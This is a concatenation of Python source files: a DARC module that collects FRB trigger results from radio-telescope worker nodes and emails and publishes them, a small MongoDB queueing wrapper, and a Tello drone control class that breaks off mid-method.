from astropy.coordinates import SkyCoord
from astropy.time import Time, TimeDelta
import numpy as np
from darc import DARCBase
from darc import util
from darc.control import send_command
from darc.definitions import WORKERS, TSAMP, TIME_UNIT
from darc.logger import get_queue_logger, get_queue_logger_listener
class ProcessorMasterManager(DARCBase):
"""
Control logic for running several ProcessorMaster instances, one per observation
"""
def __init__(self, *args, **kwargs):
"""
"""
# init DARCBase without logger, as we need a non-default logger
super(ProcessorMasterManager, self).__init__(*args, no_logger=True, **kwargs)
# initialize queue logger listener
self.log_queue = mp.Queue()
self.log_listener = get_queue_logger_listener(self.log_queue, self.log_file)
self.log_listener.start()
# create queue logger
self.logger = get_queue_logger(self.module_name, self.log_queue)
self.observations = {}
self.observation_end_times = {}
self.observation_queues = {}
self.scavenger = None
self.status_generator = None
# reduce logging from status check commands
logging.getLogger('darc.control').setLevel(logging.ERROR)
self.logger.info("{} initialized".format(self.log_name))
def run(self):
"""
Main loop. Create thread scavenger, then run parent class run method
"""
# create a thread scavenger
self.scavenger = threading.Thread(target=self.thread_scavenger, name='scavenger')
self.scavenger.start()
# create a status generator for the processing website
self.status_generator = threading.Thread(target=self.processing_status_generator, name='status_generator')
self.status_generator.start()
super(ProcessorMasterManager, self).run()
def thread_scavenger(self):
"""
Remove any finished threads at regular intervals
"""
self.logger.info("Starting thread scavenger")
while not self.stop_event.is_set():
for taskid, thread in self.observations.copy().items():
if not thread.is_alive():
# if the thread is dead, remove it from the list
self.logger.info(f"Scavenging thread of taskid {taskid}")
self.observations.pop(taskid)
self.observation_queues.pop(taskid)
self.stop_event.wait(self.scavenger_interval)
def processing_status_generator(self):
"""
At regular interval, create status file for processing website
"""
self.logger.info("Starting processing status file generator")
# create the output directory if it does not exist
util.makedirs(self.processing_status_path)
hostname = socket.gethostname()
out_file = os.path.join(self.processing_status_path, f"{hostname}.js")
while not self.stop_event.is_set():
# get list of taskids that are being processed
taskids = sorted(self.observations.keys())
times = []
if not taskids:
# nothing is running
status = "idle"
else:
status = "running"
now = Time.now()
for taskid in taskids:
# check elapsed time
processing_time = now - self.observation_end_times[taskid]
# if negative, the observation is still running
if processing_time.sec < 0:
times.append('observing')
else:
# format as hh:mm:ss
full_min, seconds = divmod(processing_time.sec, 60)
hours, minutes = divmod(full_min, 60)
times.append(f"{hours:02.0f}h{minutes:02.0f}m{seconds:02.0f}s")
content = dedent(f"""
var {hostname} = {{
"node_name": "{hostname}",
"node_status": "{status}",
"node_process": "{','.join(taskids)}",
"time": "{','.join(times)}"
}};
""")
with open(out_file, 'w') as f:
f.write(content)
self.stop_event.wait(self.processing_status_generator_interval)
# upon exit, create file to indicate node is offline
content = dedent(f"""
var {hostname} = {{
"node_name": "{hostname}",
"node_status": "offline",
"node_process": "",
"time": ""
}};
""")
with open(out_file, 'w') as f:
f.write(content)
f.flush()
def stop(self, abort=False):
"""
Stop this service
:param bool abort: Ignored; a stop of the manager always equals an abort
"""
self.logger.info("Stopping {}".format(self.log_name))
# Abort any existing observations
# loop over dictionary items. Use copy to avoid changing dict in loop
for taskid, obs in self.observations.copy().items():
if obs.is_alive():
self.logger.info(f"Aborting observation with taskid {taskid}")
self.observation_queues[taskid].put('abort')
obs.join()
# stop the log listener
self.log_listener.stop()
# stop the manager
self.stop_event.set()
# wait for subprocesses to exit
if self.scavenger is not None:
self.scavenger.join()
if self.status_generator is not None:
self.status_generator.join()
def start_observation(self, obs_config, reload=True):
"""
Initialize a ProcessorMaster and call its start_observation
"""
if reload:
self.load_config()
# add parset to obs config
obs_config['parset'] = self._load_parset(obs_config)
# get task ID
taskid = obs_config['parset']['task.taskID']
self.logger.info(f"Starting observation with task ID {taskid}")
# refuse to do anything if an observation with this task ID already exists
if taskid in self.observations.keys():
self.logger.error(f"Failed to start observation: task ID {taskid} already exists")
return
# initialize a Processor for this observation
queue = mp.Queue()
proc = ProcessorMaster(source_queue=queue, log_queue=self.log_queue, config_file=self.config_file)
proc.name = taskid
proc.start()
# start the observation and store thread
queue.put({'command': 'start_observation', 'obs_config': obs_config, 'reload': reload})
self.observations[taskid] = proc
self.observation_queues[taskid] = queue
self.observation_end_times[taskid] = Time(obs_config['startpacket'] / TIME_UNIT, format='unix') + \
TimeDelta(obs_config['duration'], format='sec')
return
def stop_observation(self, obs_config):
"""
Stop observation with task ID as given in parset
:param dict obs_config: Observation config
"""
# load the parset
parset = self._load_parset(obs_config)
# get task ID
taskid = parset['task.taskID']
# check if an observation with this task ID exists
if taskid not in self.observations.keys():
self.logger.error(f"Failed to stop observation: no such task ID {taskid}")
return
# signal the processor of this observation to stop the observation
# when processing is finished, this also stops the Process
self.observation_queues[taskid].put({'command': 'stop_observation'})
def _load_parset(self, obs_config):
"""
Load the observation parset
:param dict obs_config: Observation config
:return: parset as dict
"""
try:
# encoded parset is already in config on master node
# decode the parset
raw_parset = util.decode_parset(obs_config['parset'])
# convert to dict and store
parset = util.parse_parset(raw_parset)
except KeyError:
self.logger.info("Observation parset not found in input config, looking for master parset")
# Load the parset from the master parset file
master_config_file = os.path.join(obs_config['master_dir'], 'parset', 'darc_master.parset')
try:
# Read raw config
with open(master_config_file) as f:
master_config = f.read().strip()
# Convert to dict
master_config = util.parse_parset(master_config)
# extract obs parset and decode
raw_parset = util.decode_parset(master_config['parset'])
parset = util.parse_parset(raw_parset)
except Exception as e:
self.logger.warning(
"Failed to load parset from master config file {}, "
"setting parset to None: {}".format(master_config_file, e))
parset = None
return parset
class ProcessorMaster(DARCBase):
"""
Combine results from worker node processors
"""
def __init__(self, log_queue, *args, **kwargs):
"""
:param Queue log_queue: Queue to use for logging
"""
# init DARCBase without logger, as we need a non-default logger
super(ProcessorMaster, self).__init__(*args, no_logger=True, **kwargs)
# create queue logger
self.logger = get_queue_logger(self.module_name, log_queue)
# read result dir from worker processor config
self.result_dir = self._get_result_dir()
self.obs_config = None
self.warnings_sent = []
self.status = None
self.process = None
self.central_result_dir = None
self.logger.info("{} initialized".format(self.log_name))
def start_observation(self, obs_config, reload=True):
"""
Parse obs config and start observation processing after end time has passed
:param dict obs_config: Observation configuration
:param bool reload: reload service settings (default: True)
"""
# reload config
if reload:
self.load_config()
# add observation-specific path to result_dir
self.central_result_dir = os.path.join(self.result_dir, obs_config['date'], obs_config['datetimesource'])
util.makedirs(self.central_result_dir)
self.obs_config = obs_config
# process the observation in a separate thread (not a process, as then we can't stop it directly
# through the stop event of ProcessorMaster; and no other processing happens anyway)
self.process = threading.Thread(target=self._process_observation)
self.process.start()
def _process_observation(self):
"""
Process observation
"""
# wait until the observation finishes
start_processing_time = Time(self.obs_config['parset']['task.stopTime'])
self.logger.info("Sleeping until {}".format(start_processing_time.iso))
self.status = 'Observation in progress'
util.sleepuntil_utc(start_processing_time, event=self.stop_event)
if self.stop_event.is_set():
return
try:
# generate observation info files
self.status = 'Generating observation info files'
info, coordinates = self._generate_info_file()
if self.stop_event.is_set():
return
# wait for all result files to be present
self.status = 'Waiting for nodes to finish processing'
self._wait_for_workers()
if self.stop_event.is_set():
return
# combine results, copy to website and generate email
self.status = 'Combining node results'
email, attachments = self._process_results(info, coordinates)
if self.stop_event.is_set():
return
# publish results on web link and send email
self.status = 'Sending results to website'
self._publish_results(email, attachments)
self.status = 'Sending results to email'
self._send_email(email, attachments)
self.status = 'Done'
except Exception as e:
self.logger.error(f"Failed to process observation. Status = {self.status}: {type(e)}: {e}")
else:
self.logger.info(f"Finished processing observation: {self.obs_config['parset']['task.taskID']}: "
f"{self.obs_config['datetimesource']}")
# stop this processor instance
self.stop_event.set()
def stop_observation(self, abort=False):
"""
Stop observation
:param bool abort: Whether or not to abort the observation
"""
# nothing to stop unless we are aborting
if abort and self.process is not None:
# terminate the processing by setting the stop event (this will also stop the ProcessorMaster)
self.stop_event.set()
self.logger.info(f"Observation aborted: {self.obs_config['parset']['task.taskID']}: "
f"{self.obs_config['datetimesource']}")
elif self.process is not None:
# processing is running, nothing to do (processing will set stop event)
return
else:
# no processing is running, only stop the processor
self.stop_event.set()
def stop(self, abort=None):
"""
Stop this service
:param bool abort: Ignored, a stop of the service always equals abort
"""
if hasattr(self, 'obs_config'):
self.logger.info(f"ProcessorMaster for {self.obs_config['parset']['task.taskID']}: "
f"{self.obs_config['datetimesource']} received stop")
else:
self.logger.info("ProcessorMaster received stop")
# abort observation, this also stops the ProcessorMaster
self.stop_observation(abort=True)
def _get_result_dir(self):
"""
Get result directory from worker processor config
"""
with open(self.config_file, 'r') as f:
config = yaml.load(f, Loader=yaml.SafeLoader)['processor']
# set config, expanding strings
kwargs = {'home': os.path.expanduser('~'), 'hostname': socket.gethostname()}
return config['result_dir'].format(**kwargs)
def _wait_for_workers(self):
"""
Wait for all worker nodes to finish processing this observation
"""
obs = self.obs_config['datetimesource']
self.logger.info(f"Waiting for workers to finish processing {obs}")
twait = 0
for beam in self.obs_config['beams']:
# Log which beam we are waiting for
self.logger.info(f"{obs} waiting for results from CB{beam:02d}")
result_file = os.path.join(self.central_result_dir, f'CB{beam:02d}_summary.yaml')
# wait until the result file is present
while not os.path.isfile(result_file):
# wait until the next check time
self.stop_event.wait(self.check_interval)
# abort if processing is stopped
if self.stop_event.is_set():
return
twait += self.check_interval
# if we waited a long time, check if a warning should be sent if the node is offline
node = WORKERS[beam]
if (twait > self.max_wait_time) and (not self._check_node_online(node)) and \
(node not in self.warnings_sent) and (not os.path.isfile(result_file)):
self._send_warning(node)
# store that we sent a warning
self.warnings_sent.append(node)
def _check_node_online(self, node):
"""
Check if the processor on a node is still online and processing the current observation
:param str node: Hostname of node to check
:return: status (bool): True if node is online, else False
"""
# check if the processor on the node is online
try:
reply = send_command(self.node_timeout, 'processor', 'status', host=node)
if reply is None:
self.logger.debug(f"No reply received from {node}, assuming it is offline")
return False
status = reply['message']['processor']
except Exception as e:
self.logger.error(f"Failed to get {node} status: {type(e)}: {e}")
status = ''
if status != 'running':
# processor is not running
self.logger.debug(f"{node} processor is not running")
return False
# get list of running observations from node
self.logger.debug(f"{node} is online, checking for observations")
try:
output = send_command(self.node_timeout, 'processor', 'get_attr observations',
host=node)['message']['processor']
# parse the observation list
# the list contains reference to processes, which should be put in quotes first
output = ast.literal_eval(output.replace('<', '\'<').replace('>', '>\''))
taskids = output['ProcessorManager.observations'].keys()
except Exception as e:
self.logger.error(f"Failed to get observation list from {node}: {type(e)}: {e}")
return False
self.logger.debug(f"{node} taskids: {taskids}")
# check if the node is still processing the current taskid
try:
taskid = self.obs_config['parset']['task.taskID']
except (KeyError, TypeError):
# KeyError if parset or task.taskID are missing, TypeError if obs_config is None
self.logger.error(f"Failed to get task ID of current master observation, assuming {node} is online")
return True
if taskid in taskids:
return True
else:
return False
def _send_warning(self, node):
"""
Send a warning email about a node
:param str node: Node to send warning about
"""
# get observation info from obs config
try:
date = self.obs_config['date']
datetimesource = self.obs_config['datetimesource']
taskid = self.obs_config['parset']['task.taskID']
except (KeyError, TypeError):
# KeyError if parset or task.taskID are missing, TypeError if obs_config is None
self.logger.error(f"Failed to get parameters of current master observation, not sending warning email for "
f"{node}")
return
# generate email
beam = int(node[-2:]) - 1
content = dedent(f"""
<html>
<title>DARC Warning</title>
<body>
<p>
<h3>Warning: DARC may be offline on {node}</h3><br />
DARC on {node} is either offline or no longer processing this observation:<br />
Task ID = {taskid}<br />
Name = {datetimesource}<br />
</p>
<p>
Please check:
<ul>
<li>Is DARC still online on {node}? See status website: http://arts041.apertif/~arts/darc/status
<li>Is DARC still processing on {node}?
<ul>
<li>Check the processing website: http://arts041.apertif/~arts/darc/processing
<li>Check the log file: <code>tail -n 50 /home/arts/darc/log/processor.{node}.log</code>
<li>Check if there are files in <code>/data2/output/{date}/{datetimesource}/triggers_realtime</code>
</ul>
</ul>
</p>
<p>
If DARC is not processing the observation, do the following:
<ul>
<li>Restart DARC on {node} (only if it is offline on the status webpage or you have other reason to suspect DARC is stuck): <code>ssh arts@{node} '. darc/venv/bin/activate && darc_kill_all; darc_start_all_services'</code>
<li>Create an empty output file for this observation: <code>touch /home/arts/darc/results/{date}/{datetimesource}/CB{beam:02d}_summary.yaml</code>
</p>
</body>
</html>
""") # noqa - ignore max line length
# set email subject with trigger time
subject = f"DARC Warning: {node}"
# get FQDN in way that actually adds the domain
# simply socket.getfqdn does not actually do that on ARTS
fqdn = socket.getaddrinfo(socket.gethostname(), None, 0, socket.SOCK_DGRAM, 0, socket.AI_CANONNAME)[0][3]
frm = f"DARC Warning System <{os.getlogin()}@{fqdn}>"
to = self.email_settings['to']
body = {'type': 'html', 'content': content}
# send
self.logger.info(f"Sending {node} warning email")
util.send_email(frm, to, subject, body)
def _process_results(self, info, coordinates):
"""
Load statistics and plots from the nodes. Copy to website directory and return data to be sent as email
:param dict info: Observation info summary
:param dict coordinates: Coordinates of every CB in the observation
:return: email (str), attachments (list)
"""
self.logger.info(f"Processing results of {self.obs_config['datetimesource']}")
notes = ""
if self.obs_config['parset']['task.directionReferenceFrame'].upper() == 'HADEC':
notes += "Reference frame is HADEC: RA/Dec coordinates are given for midpoint of observation.\n"
# initialize email fields: trigger statistics, beam info, attachments
beaminfo = ""
triggers = []
attachments = []
missing_attachments = []
missing_beams = []
for beam in self.obs_config['beams']:
# load the summary file
with open(os.path.join(self.central_result_dir, f'CB{beam:02d}_summary.yaml')) as f:
info_beam = yaml.load(f, Loader=yaml.SafeLoader)
if info_beam is None:
self.logger.warning(f"Empty result file for CB{beam:02d}")
# add to email with question marks
beaminfo += "<tr><td>{beam:02d}</td>" \
"<td>?</td>" \
"<td>?</td>" \
"<td>?</td>" \
"<td>?</td></tr>".format(beam=beam)
# add warning message
missing_beams.append(f'CB{beam:02d}')
continue
beaminfo += "<tr><td>{beam:02d}</td>" \
"<td>{ncand_raw}</td>" \
"<td>{ncand_post_clustering}</td>" \
"<td>{ncand_post_thresholds}</td>" \
"<td>{ncand_post_classifier}</td></tr>".format(beam=beam, **info_beam)
if info_beam['ncand_post_classifier'] > 0:
# load the triggers
try:
triggers_beam = np.atleast_1d(np.genfromtxt(os.path.join(self.central_result_dir,
f'CB{beam:02d}_triggers.txt'),
names=True, encoding=None))
triggers.append(triggers_beam)
except FileNotFoundError:
self.logger.error(f"Missing trigger file for {self.obs_config['datetimesource']} CB{beam:02d}")
# load attachment
fname = os.path.join(self.central_result_dir, f'CB{beam:02d}.pdf')
if not os.path.isfile(fname):
missing_attachments.append(f'CB{beam:02d}')
else:
attachments.append({'path': fname, 'name': f'CB{beam:02d}.pdf', 'type': 'pdf'})
if missing_beams:
notes += f"Beams failed processing: {', '.join(missing_beams)}\n"
if missing_attachments:
notes += f"Missing PDF files for {', '.join(missing_attachments)}\n"
# combine triggers from different CBs and sort by p, then by S/N
if len(triggers) > 0:
triggers = np.sort(np.concatenate(triggers), order=('p', 'snr'))[::-1]
# save total number of triggers
info['total_triggers'] = len(triggers)
# create string of trigger info
triggerinfo = ""
ntrig = 0
for trigger in triggers:
# convert trigger to a dict usable for formatting
trigger_dict = {}
for key in triggers.dtype.names:
trigger_dict[key] = trigger[key]
# convert downsampling to width in ms
trigger_dict['width'] = trigger['downsamp'] * TSAMP.to(u.ms).value
triggerinfo += "<tr><td>{p:.2f}</td>" \
"<td>{snr:.2f}</td>" \
"<td>{dm:.2f}</td>" \
"<td>{time:.4f}</td>" \
"<td>{width:.4f}</td>" \
"<td>{cb:02.0f}</td>" \
"<td>{sb:02.0f}</td>".format(**trigger_dict)
ntrig += 1
if ntrig >= self.ntrig_email_max:
triggerinfo += "<tr><td>truncated</td><td>truncated</td><td>truncated</td>" \
"<td>truncated</td><td>truncated</td><td>truncated</td>"
break
# format the coordinate list
coordinfo = ""
for beam in sorted(coordinates.keys()):
# each beam contains list of RA, Dec, Gl, Gb
coordinfo += "<tr><td>{:02d}</td><td>{}</td><td>{}</td>" \
"<td>{}</td><td>{}</td>".format(beam, *coordinates[beam])
# format the notes
if notes:
notesinfo = '<th style="text-align:left" colspan="2">Notes</th>' \
'<td colspan="4">{}</td></tr>'.format(notes)
else:
notesinfo = ""
# format deep search plot command
try:
# extract CB00 pointing in decimal degrees
ra_hms, dec_dms = coordinates[0][:2]
pointing = SkyCoord(ra_hms, dec_dms, unit=(u.hourangle, u.deg))
date = ''.join(self.obs_config['datetimesource'].split('-')[:3])
plot_cmd = f'python2 {self.plot_script} --ra {pointing.ra.deg:.6f} --dec {pointing.dec.deg:.6f} ' \
f'--date {date} --root {self.obs_config["datetimesource"]}'
except KeyError:
# no pointing found for CB00
plot_cmd = 'Error: no CB00 pointing found'
self.logger.error("Failed to generate deep search command: no CB00 pointing found")
# add info strings to overall info
info['beaminfo'] = beaminfo
info['coordinfo'] = coordinfo
info['triggerinfo'] = triggerinfo
info['notes'] = notesinfo
info['plot_cmd'] = plot_cmd
# generate the full email html
# using a second level dict here because str.format does not support keys containing a dot
email = dedent("""
<html>
<head><title>FRB Alert System</title></head>
<body>
<p>
<table style="width:40%">
<tr>
<th style="text-align:left" colspan="2">UTC start</th>
<td colspan="4">{d[task.startTime]}</td>
</tr><tr>
<th style="text-align:left" colspan="2">Source</th>
<td colspan="4">{d[task.source.name]}</td>
</tr><tr>
<th style="text-align:left" colspan="2">Observation duration</th>
<td colspan="4">{d[task.duration]} s</td>
</tr><tr>
<th style="text-align:left" colspan="2">Task ID</th>
<td colspan="4">{d[task.taskID]}</td>
</tr><tr>
<th style="text-align:left" colspan="2">Classifier probability threshold (freq-time)</th>
<td colspan="4">{d[classifier_threshold_freqtime]:.2f}</td>
</tr><tr>
<th style="text-align:left" colspan="2">Classifier probability threshold (dm-time)</th>
<td colspan="4">{d[classifier_threshold_dmtime]:.2f}</td>
</tr><tr>
<th style="text-align:left" colspan="2">YMW16 DM (central beam)</th>
<td colspan="4">{d[ymw16]:.2f} pc cm<sup>-3</sup></td>
</tr><tr>
<th style="text-align:left" colspan="2">Used telescopes</th>
<td colspan="4">{d[task.telescopes]}</td>
</tr><tr>
<th style="text-align:left" colspan="2">Central frequency</th>
<td colspan="4">{d[freq]} MHz</td>
</tr><tr>
<th style="text-align:left" colspan="2">Total number of candidates</th>
<td colspan="4">{d[total_triggers]}</td>
</tr><tr>
<th style="text-align:left" colspan="2">Trigger web link</th>
<td colspan="4">{d[web_link]}</td>
</tr><tr>
<th style="text-align:left" colspan="2">Deep search command</th>
<td colspan="4">{d[plot_cmd]}</td>
</tr>{d[notes]}
</table>
</p>
<hr align="left" width="50%" />
<p><h2>Number of triggers per Compound Beam</h2><br />
<table style="width:50%">
<tr style="text-align:left">
<th>CB</th>
<th>AMBER</th>
<th>After grouping</th>
<th>After local S/N threshold</th>
<th>After classifier</th>
</tr>
{d[beaminfo]}
</table>
</p>
<hr align="left" width="50%" />
<p><h2>Compound Beam positions</h2><br />
<table style="width:50%">
<tr style="text-align:left">
<th>CB</th>
<th>RA (hms)</th>
<th>Dec (dms)</th>
<th>Gl (deg)</th>
<th>Gb (deg)</th>
</tr>
{d[coordinfo]}
</table>
</p>
<hr align="left" width="50%" />
<p><h2>FRB candidates</h2><br />
<table style="width:50%">
<tr style="text-align:left">
<th>Probability</th>
<th>S/N</th>
<th>DM (pc/cc)</th>
<th>Arrival time (s)</th>
<th>Width (ms)</th>
<th>CB</th>
<th>SB</th>
</tr>
{d[triggerinfo]}
</table>
</p>
</body>
</html>
""").format(d=info)
return email, attachments
def _publish_results(self, body, files):
"""
Publish email content as local website
"""
# create output folder
web_folder = '{home}/public_html/darc/{webdir}/{date}/{datetimesource}'.format(webdir=self.webdir,
**self.obs_config)
util.makedirs(web_folder)
# save the email body, ensuring it is at the top of the list in a browser
with open(os.path.join(web_folder, 'A_info.html'), 'w') as f:
f.write(body)
# create symlinks to PDFs. These are outside the public_html folder, but they are readable as long as they
# are owned by the same user
for src in files:
dest = os.path.join(web_folder, os.path.basename(src['path']))
try:
os.symlink(src['path'], dest)
except FileExistsError:
os.remove(dest)
os.symlink(src['path'], dest)
self.logger.info(f"Published results of {self.obs_config['datetimesource']}")
def _send_email(self, email, attachments):
"""
Send email with observation results
:param str email: Email body
:param list attachments: Attachments
"""
subject = f"ARTS FRB Alert System - {self.obs_config['datetimesource']}"
# get FQDN in way that actually adds the domain
# simply socket.getfqdn does not actually do that on ARTS
fqdn = socket.getaddrinfo(socket.gethostname(), None, 0, socket.SOCK_DGRAM, 0, socket.AI_CANONNAME)[0][3]
frm = f"ARTS FRB Alert System <{os.getlogin()}@{fqdn}>"
to = self.email_settings['to']
body = {'type': 'html', 'content': email}
util.send_email(frm, to, subject, body, attachments)
self.logger.info(f"Sent email for {self.obs_config['datetimesource']}")
def _generate_info_file(self):
"""
Generate observation info files
:return: info (dict), coordinates of each CB (dict)
"""
# generate observation summary file
fname = os.path.join(self.central_result_dir, 'info.yaml')
# start with the observation parset
parset = self.obs_config['parset']
info = parset.copy()
# format telescope list
info['task.telescopes'] = info['task.telescopes'].replace('[', '').replace(']', '')
# Add central frequency
info['freq'] = self.obs_config['freq']
# Add YMW16 DM limit for CB00
info['ymw16'] = util.get_ymw16(self.obs_config['parset'], 0, self.logger)
# Add exact start time (startpacket)
info['startpacket'] = self.obs_config['startpacket']
# Add classifier probability thresholds
with open(self.config_file, 'r') as f:
classifier_config = yaml.load(f, Loader=yaml.SafeLoader)['processor']['classifier']
info['classifier_threshold_freqtime'] = classifier_config['thresh_freqtime']
info['classifier_threshold_dmtime'] = classifier_config['thresh_dmtime']
# add path to website
# get FQDN in way that actually adds the domain
# simply socket.getfqdn does not actually do that on ARTS
fqdn = socket.getaddrinfo(socket.gethostname(), None, 0, socket.SOCK_DGRAM, 0, socket.AI_CANONNAME)[0][3]
info['web_link'] = 'http://{fqdn}/~{user}/darc/{webdir}/' \
'{date}/{datetimesource}'.format(fqdn=fqdn, user=os.getlogin(),
webdir=self.webdir, **self.obs_config)
# save the file
with open(fname, 'w') as f:
yaml.dump(info, f, default_flow_style=False)
# generate file with coordinates
coordinates = {}
for beam in self.obs_config['beams']:
try:
key = "task.beamSet.0.compoundBeam.{}.phaseCenter".format(beam)
c1, c2 = ast.literal_eval(parset[key].replace('deg', ''))
if parset['task.directionReferenceFrame'] == 'HADEC':
# convert HADEC to J2000 RADEC at midpoint of observation
midpoint = Time(parset['task.startTime']) + .5 * float(parset['task.duration']) * u.s
pointing = SkyCoord(*util.hadec_to_radec(c1 * u.deg, c2 * u.deg, midpoint))
else:
pointing = SkyCoord(c1, c2, unit=(u.deg, u.deg))
except Exception as e:
self.logger.error("Failed to get pointing for CB{:02d}: {}".format(beam, e))
coordinates[beam] = ['-1', '-1', '-1', '-1']
else:
# get pretty strings
ra = pointing.ra.to_string(unit=u.hourangle, sep=':', pad=True, precision=1)
dec = pointing.dec.to_string(unit=u.deg, sep=':', pad=True, precision=1)
gl, gb = pointing.galactic.to_string(precision=8).split(' ')
coordinates[beam] = [ra, dec, gl, gb]
# save to result dir
with open(os.path.join(self.central_result_dir, 'coordinates.txt'), 'w') as f:
f.write("#CB RA Dec Gl Gb\n")
for beam, coord in coordinates.items():
f.write("{:02d} {} {} {} {}\n".format(beam, *coord))
return info, coordinates
|
mongo.py | # from typing import List
from datetime import datetime
from queue import Queue
import pymongo, threading
class Mongo(object):
def __init__(self, mongoConfig:dict, queue:Queue):
self.__set_vars(mongoConfig)
self.queue: Queue = queue
self.client: pymongo.MongoClient = None
self.database: pymongo.database.Database = None
self.collection: pymongo.collection.Collection = None
def __set_vars(self, config:dict):
self.MONGO_HOST = config["HOST"]
self.MONGO_PORT = config["PORT"]
self.MONGO_USER = config["USER"] if config["USER"] else None
self.MONGO_PASS = config["PASS"] if config["PASS"] else None
self.MONGO_DB = config["DATABASE"]
self.MONGO_COLLECTION = config["COLLECTION"]
self.MONGO_TIMEOUT = config["TIMEOUT"]
self.MONGO_DATETIME_FORMAT = "%d/%m/%Y %H:%M:%S"
def connect(self,):
print("Connecting Mongo")
self.client = pymongo.MongoClient(
host=self.MONGO_HOST,
port=self.MONGO_PORT,
username=self.MONGO_USER,
password=self.MONGO_PASS
)
self.database = self.client.get_database(self.MONGO_DB)
self.collection = self.database.get_collection(self.MONGO_COLLECTION)
self.connected()
def disconnect(self):
print("Disconnecting Mongo")
if self.client:
self.client.close()
self.client = None
def connected(self) -> bool:
if not self.client:
return False
try:
self.client.admin.command("ismaster")
except pymongo.errors.PyMongoError:
return False
else:
return True
def __enqueue(self, msg: dict):
print("Enqueuing")
self.queue.put(msg)
def __sync_queue(self,):
if self.queue.qsize():
self.save(self.queue.get())
def __store_thread_f(self, msg: dict):
print("Storing")
try:
result = self.collection.insert_one(msg)
print("Saved in Mongo document ID", result.inserted_id)
if not result.acknowledged:
# Enqueue message if it was not saved properly
self.__enqueue(msg)
except Exception as ex:
print(ex)
def __store(self, msg:dict):
th = threading.Thread(target=self.__store_thread_f, args=(msg,))
th.daemon = True
th.start()
def save(self, msg: dict):
print("Saving")
if self.connected():
self.__store(msg)
else:
self.__enqueue(msg)
def run(self,):
while True:
try:
self.__sync_queue()
except Exception as err:
print(f"ERROR: {err}")
|
tello.py | import socket
import threading
import time
import numpy as np
import libh264decoder
class Tello:
"""Wrapper class to interact with the Tello drone."""
def __init__(self, local_ip, local_port, imperial=False, command_timeout=.3, tello_ip='192.168.10.1',
tello_port=8889):
"""
Binds to the local IP/port and puts the Tello into command mode.
:param local_ip (str): Local IP address to bind.
:param local_port (int): Local port to bind.
:param imperial (bool): If True, speed is MPH and distance is feet.
If False, speed is KPH and distance is meters.
:param command_timeout (int|float): Number of seconds to wait for a response to a command.
:param tello_ip (str): Tello IP.
:param tello_port (int): Tello port.
"""
self.for_debug = False
self.video_only_flag = True
self.abort_flag = False
self.decoder = libh264decoder.H264Decoder()
self.command_timeout = command_timeout
self.imperial = imperial
self.response = None
self.frame = None # numpy array BGR -- current camera output frame
self.is_freeze = False # freeze current camera output
self.last_frame = None
self.last_height = 0
self.local_video_port = 11111 # port for receiving video stream
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # socket for sending cmd
self.socket_video = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # socket for receiving video stream
self.tello_address = (tello_ip, tello_port)
if self.video_only_flag:
self.socket.bind((local_ip, local_port))
# thread for receiving cmd ack
self.receive_thread = threading.Thread(target=self._receive_thread)
self.receive_thread.daemon = True
self.receive_thread.start()
# to receive video -- send cmd: command, streamon
#self.socket.sendto(b'command', self.tello_address)
#print ('sent: command')
#self.socket.sendto(b'streamon', self.tello_address)
#print ('sent: streamon')
self.socket_video.bind((local_ip, self.local_video_port))
# thread for receiving video
self.receive_video_thread = threading.Thread(target=self._receive_video_thread)
self.receive_video_thread.daemon = True
self.receive_video_thread.start()
def __del__(self):
"""Closes the local socket."""
self.socket.close()
self.socket_video.close()
def read(self):
"""Return the last frame from camera."""
if self.is_freeze:
return self.last_frame
else:
return self.frame
def video_freeze(self, is_freeze=True):
"""Pause video output -- set is_freeze to True"""
self.is_freeze = is_freeze
if is_freeze:
self.last_frame = self.frame
def _receive_thread(self):
"""Listen to responses from the Tello.
Runs as a thread, sets self.response to whatever the Tello last returned.
"""
while True:
try:
self.response, ip = self.socket.recvfrom(3000)
#print(self.response)
except socket.error as exc:
print ("Caught exception socket.error : %s" % exc)
def _receive_video_thread(self):
"""
Listens for video streaming (raw h264) from the Tello.
Runs as a thread, sets self.frame to the most recent frame Tello captured.
"""
packet_data = ""
while True:
try:
res_string, ip = self.socket_video.recvfrom(2048)
packet_data += res_string
# end of frame
if len(res_string) != 1460:
for frame in self._h264_decode(packet_data):
self.frame = frame
packet_data = ""
except socket.error as exc:
print ("Caught exception socket.error : %s" % exc)
def _h264_decode(self, packet_data):
"""
decode raw h264 format data from Tello
:param packet_data: raw h264 data array
:return: a list of decoded frame
"""
res_frame_list = []
frames = self.decoder.decode(packet_data)
for framedata in frames:
(frame, w, h, ls) = framedata
if frame is not None:
# print 'frame size %i bytes, w %i, h %i, linesize %i' % (len(frame), w, h, ls)
frame = np.fromstring(frame, dtype=np.ubyte, count=len(frame), sep='')
frame = (frame.reshape((h, ls / 3, 3)))
frame = frame[:, :w, :]
res_frame_list.append(frame)
return res_frame_list
def send_command(self, command):
"""
Send a command to the Tello and wait for a response.
:param command: Command to send.
:return (str): Response from Tello.
"""
if self.for_debug:
print (">> send cmd: {}".format(command))
self.abort_flag = False
timer = threading.Timer(self.command_timeout, self.set_abort_flag)
self.socket.sendto(command.encode('utf-8'), self.tello_address)
timer.start()
while self.response is None:
if self.abort_flag is True:
break
timer.cancel()
if self.response is None:
response = 'none_response'
else:
response = self.response.decode('utf-8')
self.response = None
return response
def set_abort_flag(self):
"""
Sets self.abort_flag to True.
Used by the timer in Tello.send_command() to indicate to that a response
timeout has occurred.
"""
self.abort_flag = True
def takeoff(self):
"""
Initiates take-off.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
return self.send_command('takeoff')
def set_speed(self, speed):
"""
Sets speed.
This method expects KPH or MPH. The Tello API expects speeds from
1 to 100 centimeters/second.
Metric: .1 to 3.6 KPH
Imperial: .1 to 2.2 MPH
Args:
speed (int|float): Speed.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
speed = float(speed)
if self.imperial is True:
speed = int(round(speed * 44.704))
else:
speed = int(round(speed * 27.7778))
return self.send_command('speed %s' % speed)
def rotate_cw(self, degrees):
"""
Rotates clockwise.
Args:
degrees (int): Degrees to rotate, 1 to 360.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
return self.send_command('cw %s' % degrees)
def rotate_ccw(self, degrees):
"""
Rotates counter-clockwise.
Args:
degrees (int): Degrees to rotate, 1 to 360.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
return self.send_command('ccw %s' % degrees)
def flip(self, direction):
"""
Flips.
Args:
